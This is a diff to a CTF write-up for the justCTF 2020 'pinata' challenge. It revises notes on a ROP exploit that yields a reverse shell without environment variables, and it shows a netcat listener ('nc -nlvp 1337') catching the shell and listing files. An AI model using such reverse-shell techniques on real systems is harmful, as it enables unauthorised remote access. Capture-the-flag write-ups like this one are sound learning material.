dianalin2/website/writeups/2021-01-31-justctf-2020-pinata/pinata.md

 send_stuff(rop).recv()
 ```

-We need to set `PATH` after receiving the reverse shell because the sandboxed process does not inherit environment variables.
+Since we set `envp` to NULL, the shell does not have any environment variables (so no `PATH`).
+We can either `export PATH=/bin` or just use absolute paths to `ls` and `cat`.
 ```
 $ nc -nlvp 1337
 Listening on 0.0.0.0 1337
-Connection received on 104.248.193.133 45114
+Connection received on 127.0.0.1 42784
-sh: cannot set terminal process group (1): Inappropriate ioctl for device
+bash: cannot set terminal process group (1): Inappropriate ioctl for device
-sh: no job control in this shell sh-4.4$ export PATH=/bin sh-4.4$ ls bin default.script dev
+bash: no job control in this shell bash-4.4$ /bin/ls bin default.script dev